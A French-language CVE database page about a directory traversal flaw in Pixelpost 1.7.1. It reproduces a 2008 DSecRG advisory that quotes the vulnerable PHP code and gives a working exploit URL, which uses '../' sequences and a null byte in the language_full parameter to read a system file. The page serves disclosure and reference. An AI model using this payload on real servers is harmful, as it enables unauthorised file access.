CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Directory traversal vulnerability in index.php in Pixelpost 1.7.1 on Windows, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language_full parameter.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
7.2%
–
–
2022-02-13
–
–
7.2%
–
–
2022-04-03
–
–
7.2%
–
–
2023-03-12
–
–
–
1.12%
–
2023-04-16
–
–
–
1.12%
–
2024-02-11
–
–
–
1.19%
–
2024-06-02
–
–
–
1.19%
–
2024-10-27
–
–
–
1.19%
–
2024-12-22
–
–
–
2.68%
–
2025-01-19
–
–
–
2.68%
–
2025-03-18
–
–
–
–
8.78%
2025-03-18
–
–
–
–
8.78,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2008-07-27 22h00 +00:00 Auteur : DSecRG EDB Vérifié : Yes
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-033
Application: Pixelpost photoblog
Versions Affected: 1.7.1
Vendor URL: http://www.pixelpost.org/
Bug: Local File Include
Exploits: YES
Reported: 22.07.2008
Vendor response: 23.07.2008
Solution: YES
Date of Public Advisory: 28.07.2008
Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Pixelpost photoblog has local file include vulnerability in script index.php
Successful exploitation requires that "register_globals" is enabled.
Code
****
#################################################
$PP_supp_lang = array('dutch'=>array('NL','Nederlands'),
'english'=>array('EN','English'),
'french'=>array('FR','Francais'),
'german'=>array('DE','Deutsch'),
'italian'=>array('IT','Italiano'),
'norwegian'=>array('NO','Norsk'),
'persian'=>array('FA','Farsi'),
'polish'=>array('PL','Polskiego'),
'portuguese'=>array('PT','Portugues'),
'simplified_chinese'=>array('CN','Chinese'),
'spanish'=>array('ES','Espanol'),
'swedish'=>array('SE','Svenska'),
'danish'=>array('DK','Dansk'),
'japanese'=>array('JP','Japanese'),
'hungarian'=>array('HU','Magyar'),
'romanian'=>array('RO','Romana'),
'russian'=>array('RU','Russian'),
'czech'=>array('CS','Cesky')
);
...
if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); }
foreach ($PP_supp_lang as $key => $row) {
foreach($row as $cell){
if ($cell == strtoupper($language_abr)) { $language_full = $key; }
}
}
...
if(!empty($language_full)) {
if(file_exists("language/lang-".$language_full.".php")) {
if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) {
require("language/lang-".$language_full.".php");
}
}else{
...
#################################################
Example:
http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00
Solution
********
Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here:
http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
# milw0rm.com [2008-07-28]